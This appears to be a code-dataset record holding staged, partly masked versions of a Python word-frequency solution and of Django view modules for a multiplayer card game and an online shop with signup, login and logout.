"blob_id": "3bb50b61c7a3e98ede0a31e574f39b4ea7f22de5",
"index": 9197,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n import re\n from collections import Counter\n paragraph = re.sub('[\\\\W]', ' ', paragraph)\n words = paragraph.strip().split()\n words = map(str.lower, words)\n cnt = Counter(words)\n for word, _ in cnt.most_common():\n if word not in banned:\n return word\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n import re\n from collections import Counter\n paragraph = re.sub('[\\\\W]', ' ', paragraph)\n words = paragraph.strip().split()\n words = map(str.lower, words)\n cnt = Counter(words)\n for word, _ in cnt.most_common():\n if word not in banned:\n return word\n\n\nif __name__ == '__main__':\n paragraph = 'a, a, a, a, b,b,b,c, c'\n banned = ['a']\n sol = Solution()\n print(sol.mostCommonWord(paragraph, banned))\n",
"step-5": "\"\"\"\ncorner cases like:\n\nword[!?',;.]\nword[!?',;.]word[!?',;.]word\n\n\nso don't consider the punctuation will only exist after one word, and followed by a whitespace\n\nuse re for regular expression match,\nreplace or punctuations, and split words\n\n\"\"\"\n\n\nclass Solution:\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n # def filterpunc(word):\n # word = word.lower()\n # for p in \"!?',;.\":\n # word = word.strip(p)\n # if word in banned:\n # return ''\n # return word\n # from collections import Counter\n # banned = set(banned)\n # words = paragraph.strip().split()\n # # words = list(filter(lambda x: not any(map(lambda y: y in x, list(\"!?',;.\"))), words))\n # words = list(filter(lambda x: x not in \"!?',;.\", words))\n # words = map(filterpunc, words)\n # words = filter(None, words)\n # return Counter(words).most_common(1)[0][0]\n \n import re\n from collections import Counter\n paragraph = re.sub('[\\W]', ' ', paragraph)\n words = paragraph.strip().split()\n words = map(str.lower, words)\n cnt = Counter(words)\n for word,_ in cnt.most_common():\n if word not in banned:\n return word\n\n\nif __name__ == \"__main__\":\n # paragraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\n # banned = [\"hit\"]\n # paragraph = \"Bob. hIt, baLl\"\n # banned = [\"bob\", \"hit\"]\n paragraph = \"a, a, a, a, b,b,b,c, c\"\n banned = ['a']\n sol = Solution()\n print(sol.mostCommonWord(paragraph, banned))\n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
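A quick illustration of the normalization step the mostCommonWord record
above relies on: re.sub(r'[\W]', ' ', ...) replaces every non-word character
with a space, so punctuation never stays attached to a word. This is a
standalone sketch, independent of the Solution class.

import re
from collections import Counter

paragraph = "Bob hit a ball, the hit BALL flew far after it was hit."
words = re.sub(r'[\W]', ' ', paragraph).lower().split()
print(Counter(words).most_common(3))
# [('hit', 3), ('ball', 2), ('bob', 1)]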
from django.shortcuts import render, redirect
from .models import Game, Player, CardsInHand, Feedback
from django.db.models import Q
from .forms import GameForm, JoinForm, FeedbackForm
from django.shortcuts import get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.views.generic import CreateView
import json
# from django.contrib.auth.decorators import login_required
def get_joined_players(request, game_id):
game = get_object_or_404(Game, pk=game_id)
return HttpResponse(str(game.joined_players))
def create_new_game(request):
if request.method == "POST":
form_data = json.loads(request.body.decode('utf-8'))
form = GameForm(form_data)
if form.is_valid():
number_of_players = form.cleaned_data["number_of_players"]
new_game = Game(number_of_players=int(number_of_players))
new_game.instantiate() # initializes new game
new_game.save() # save new game to db
# create first player
new_player = Player(name=form.cleaned_data["creator_name"], game_id=new_game)
new_player.save()
# create new session to allow the user to play the game
request.session['player_id'] = new_player.pk
return JsonResponse({
"code": new_game.code,
"game_id": new_game.pk,
"number_of_players": number_of_players,
})
# return render(request, "game_created.html", {
# "form": form,
# "game_code": new_game.code,
# "n_players": number_of_players,
# "game_id": new_game.pk,
# "your_name": new_player.name,
# })
else:
return JsonResponse(form.errors.as_json(), safe=False, status=400)
else:
# set a dummy player id in player's session. this is needed to make channels session persistence work (for matchmaking)
if('player_id' not in request.session):
request.session['player_id'] = 0
create_form = GameForm(initial={'number_of_players': '2'})
join_form = JoinForm()
feedback_form = FeedbackForm()
return render(
request,
"newhome.html",
{
"create_form": create_form,
"join_form": join_form,
"feedback_form": feedback_form,
}
)
def join_game(request):
if request.method != "POST":
return HttpResponseRedirect("/game")
form_data = json.loads(request.body.decode('utf-8'))
form = JoinForm(form_data)
if form.is_valid():
code = int(form.cleaned_data['code'])
input_name = form.cleaned_data['name']
else:
return JsonResponse(form.errors.as_json(), safe=False, status=400)
game = get_object_or_404(Game, code=code)
if(game.joined_players < game.number_of_players):
# increment the number of players who joined this game
game.joined_players = game.joined_players + 1
game.save()
# create player and append it to this game
new_player = Player(name=input_name, game_id=game, player_number=game.joined_players)
new_player.save()
# create new session to allow user to play
request.session['player_id'] = new_player.pk
if(new_player.player_number == game.number_of_players):
            # last player joined: deal cards to all players; game can now begin
game.deal_cards_to_players()
return JsonResponse(game.pk, safe=False)
def game(request, game_id):
err_str = ''
this_game = get_object_or_404(Game, pk=game_id)
print(request.session.keys())
# if game is over, redirect to home
if this_game.has_been_won:
return redirect(create_new_game)
# get players who joined this game
players = Player.objects.filter(game_id=game_id)
if('player_id' not in request.session): # check if user has a session variable player_id
err_str = "Unauthenticated user"
this_player = get_object_or_404(Player, pk=request.session['player_id'])
if(this_player not in players): # check if this player has joined the game
err_str = "La partita richiesta non esiste o si è già conclusa."
if err_str != '':
return render(
request,
'error.html',
{
'error': err_str,
},
status=403
)
return render(request, 'gametest.html', {
'game_id': this_game.pk,
'number_of_players': this_game.number_of_players,
})
def feedback_create(request):
if request.method != "POST":
return HttpResponseRedirect("/game")
form_data = json.loads(request.body.decode('utf-8'))
form = FeedbackForm(form_data)
if form.is_valid():
sender_name = form.cleaned_data['sender_name']
email = form.cleaned_data['email']
message = form.cleaned_data['message']
else:
return JsonResponse(form.errors.as_json(), safe=False, status=400)
feedback = Feedback(sender_name=sender_name, email=email, message=message)
feedback.save()
return JsonResponse("[]", status=200, safe=False)
def restart_game(request, game_id):
this_game = get_object_or_404(Game, pk=game_id)
# if game isn't over, redirect to home
if not this_game.has_been_won:
return redirect(create_new_game)
# get players who joined this game
players = Player.objects.filter(game_id=game_id)
if('player_id' not in request.session): # check if user has a session variable player_id
return redirect(create_new_game)
this_player = get_object_or_404(Player, pk=request.session['player_id'])
if(this_player not in players): # check if this player has joined the game
return redirect(create_new_game)
this_game.reset()
this_game.deal_cards_to_players()
return JsonResponse({'status': 'ok'})
|
normal
|
{
"blob_id": "d650f578ea30772489625ee26f3e4bf04131964b",
"index": 6140,
"step-1": "<mask token>\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\n<mask token>\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-2": "<mask token>\n\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\n\n<mask token>\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\ndef feedback_create(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse('[]', status=200, safe=False)\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-3": "<mask token>\n\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\n\ndef create_new_game(request):\n if request.method == 'POST':\n form_data = json.loads(request.body.decode('utf-8'))\n form = GameForm(form_data)\n if form.is_valid():\n number_of_players = form.cleaned_data['number_of_players']\n new_game = Game(number_of_players=int(number_of_players))\n new_game.instantiate()\n new_game.save()\n new_player = Player(name=form.cleaned_data['creator_name'],\n game_id=new_game)\n new_player.save()\n request.session['player_id'] = new_player.pk\n return JsonResponse({'code': new_game.code, 'game_id': new_game\n .pk, 'number_of_players': number_of_players})\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n else:\n if 'player_id' not in request.session:\n request.session['player_id'] = 0\n create_form = GameForm(initial={'number_of_players': '2'})\n join_form = JoinForm()\n feedback_form = FeedbackForm()\n return render(request, 'newhome.html', {'create_form': create_form,\n 'join_form': join_form, 'feedback_form': feedback_form})\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\ndef feedback_create(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse('[]', status=200, safe=False)\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player 
= get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-4": "from django.shortcuts import render, redirect\nfrom .models import Game, Player, CardsInHand, Feedback\nfrom django.db.models import Q\nfrom .forms import GameForm, JoinForm, FeedbackForm\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.views.generic import CreateView\nimport json\n\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\n\ndef create_new_game(request):\n if request.method == 'POST':\n form_data = json.loads(request.body.decode('utf-8'))\n form = GameForm(form_data)\n if form.is_valid():\n number_of_players = form.cleaned_data['number_of_players']\n new_game = Game(number_of_players=int(number_of_players))\n new_game.instantiate()\n new_game.save()\n new_player = Player(name=form.cleaned_data['creator_name'],\n game_id=new_game)\n new_player.save()\n request.session['player_id'] = new_player.pk\n return JsonResponse({'code': new_game.code, 'game_id': new_game\n .pk, 'number_of_players': number_of_players})\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n else:\n if 'player_id' not in request.session:\n request.session['player_id'] = 0\n create_form = GameForm(initial={'number_of_players': '2'})\n join_form = JoinForm()\n feedback_form = FeedbackForm()\n return render(request, 'newhome.html', {'create_form': create_form,\n 'join_form': join_form, 'feedback_form': feedback_form})\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\ndef feedback_create(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n 
feedback.save()\n return JsonResponse('[]', status=200, safe=False)\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-5": "from django.shortcuts import render, redirect\nfrom .models import Game, Player, CardsInHand, Feedback\nfrom django.db.models import Q\nfrom .forms import GameForm, JoinForm, FeedbackForm\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.views.generic import CreateView\nimport json\n# from django.contrib.auth.decorators import login_required\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\ndef create_new_game(request):\n if request.method == \"POST\":\n form_data = json.loads(request.body.decode('utf-8'))\n form = GameForm(form_data)\n\n if form.is_valid():\n number_of_players = form.cleaned_data[\"number_of_players\"]\n\n new_game = Game(number_of_players=int(number_of_players))\n new_game.instantiate() # initializes new game\n new_game.save() # save new game to db\n\n # create first player\n new_player = Player(name=form.cleaned_data[\"creator_name\"], game_id=new_game)\n new_player.save()\n\n # create new session to allow the user to play the game\n request.session['player_id'] = new_player.pk\n\n return JsonResponse({\n \"code\": new_game.code,\n \"game_id\": new_game.pk,\n \"number_of_players\": number_of_players,\n })\n # return render(request, \"game_created.html\", {\n # \"form\": form,\n # \"game_code\": new_game.code,\n # \"n_players\": number_of_players,\n # \"game_id\": new_game.pk,\n # \"your_name\": new_player.name,\n # })\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n else:\n # set a dummy player id in player's session. this is needed to make channels session persistence work (for matchmaking)\n if('player_id' not in request.session):\n request.session['player_id'] = 0\n\n create_form = GameForm(initial={'number_of_players': '2'})\n join_form = JoinForm()\n feedback_form = FeedbackForm()\n return render(\n request,\n \"newhome.html\",\n {\n \"create_form\": create_form,\n \"join_form\": join_form,\n \"feedback_form\": feedback_form,\n }\n )\n\ndef join_game(request):\n if request.method != \"POST\":\n return HttpResponseRedirect(\"/game\")\n\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n\n game = get_object_or_404(Game, code=code)\n if(game.joined_players < game.number_of_players):\n # increment the number of players who joined this game\n game.joined_players = game.joined_players + 1\n game.save()\n # create player and append it to this game\n new_player = Player(name=input_name, game_id=game, player_number=game.joined_players)\n new_player.save()\n\n # create new session to allow user to play\n request.session['player_id'] = new_player.pk\n\n if(new_player.player_number == game.number_of_players):\n # last player joined: deal cards to all players; game can now being\n game.deal_cards_to_players()\n\n return JsonResponse(game.pk, safe=False)\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n\n # if game is over, redirect to home\n if this_game.has_been_won:\n return redirect(create_new_game)\n\n # get players who joined this game\n players = Player.objects.filter(game_id=game_id)\n\n if('player_id' not in request.session): # check if user has a session variable 
player_id\n err_str = \"Unauthenticated user\"\n\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if(this_player not in players): # check if this player has joined the game\n err_str = \"La partita richiesta non esiste o si è già conclusa.\"\n\n if err_str != '':\n return render(\n request,\n 'error.html',\n {\n 'error': err_str,\n },\n status=403\n )\n\n return render(request, 'gametest.html', {\n 'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players,\n })\n\ndef feedback_create(request):\n if request.method != \"POST\":\n return HttpResponseRedirect(\"/game\")\n\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse(\"[]\", status=200, safe=False)\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n\n # if game isn't over, redirect to home\n if not this_game.has_been_won:\n return redirect(create_new_game)\n\n # get players who joined this game\n players = Player.objects.filter(game_id=game_id)\n\n if('player_id' not in request.session): # check if user has a session variable player_id\n return redirect(create_new_game)\n\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if(this_player not in players): # check if this player has joined the game\n return redirect(create_new_game)\n\n this_game.reset()\n this_game.deal_cards_to_players()\n\n return JsonResponse({'status': 'ok'})\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
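The POST handlers in the views above share one pattern: decode the JSON
request body, bind it to a Django form, and answer with
form.errors.as_json() and status 400 when validation fails. Below is a
minimal sketch of that pattern in isolation; DemoForm is a stand-in, not
part of the record, and the helper assumes it runs inside a configured
Django project.

import json

from django import forms
from django.http import JsonResponse


class DemoForm(forms.Form):
    code = forms.IntegerField()
    name = forms.CharField(max_length=50)


def validate_json_post(request, form_class=DemoForm):
    # Parse the raw JSON body, then run it through normal form validation.
    data = json.loads(request.body.decode('utf-8'))
    form = form_class(data)
    if not form.is_valid():
        return None, JsonResponse(form.errors.as_json(), safe=False, status=400)
    return form.cleaned_data, None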
<|reserved_special_token_0|>
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product, 'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
<|reserved_special_token_0|>
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, 'shop/login.html')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def product_list(request):
products = Product.objects.filter(available=True)
context = {'products': products, 'user': request.user}
return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product, 'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
def user_login(request):
context = {'form': UserLogInForm}
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user:
login(request, user)
return redirect('/shop/')
else:
context['error'] = 'Provide valid credentials'
return render(request, 'shop/login.html', context)
else:
return render(request, 'shop/login.html', context)
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, 'shop/login.html')
<|reserved_special_token_1|>
from typing import Dict, Any
from urllib import request
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from .models import Product
from cart.forms import CartAddProductForm
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from .forms import UserForm, UserLogInForm
from django.views import generic
from django.views.generic import View
def product_list(request):
products = Product.objects.filter(available=True)
context = {'products': products, 'user': request.user}
return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product, 'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
def user_login(request):
context = {'form': UserLogInForm}
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user:
login(request, user)
return redirect('/shop/')
else:
context['error'] = 'Provide valid credentials'
return render(request, 'shop/login.html', context)
else:
return render(request, 'shop/login.html', context)
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, 'shop/login.html')
<|reserved_special_token_1|>
from typing import Dict, Any
from urllib import request
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from .models import Product
from cart.forms import CartAddProductForm
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from .forms import UserForm, UserLogInForm
from django.views import generic
from django.views.generic import View
def product_list(request):
products = Product.objects.filter(available=True)
context = {'products': products,
'user': request.user}
return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product,
'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
# display blank form
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
# process form data
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
#print(request.user.is_authenticated())
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
def user_login(request):
context = {
'form': UserLogInForm
}
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user:
login(request, user)
return redirect('/shop/')
else:
context['error'] = "Provide valid credentials"
return render(request, 'shop/login.html', context)
else:
return render(request, 'shop/login.html', context)
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, "shop/login.html")
|
flexible
|
{
"blob_id": "1d72a9882aea1e0f808969828ed2e69ecd79ac71",
"index": 7522,
"step-1": "<mask token>\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product, 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\n<mask token>\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n return render(request, 'shop/login.html')\n",
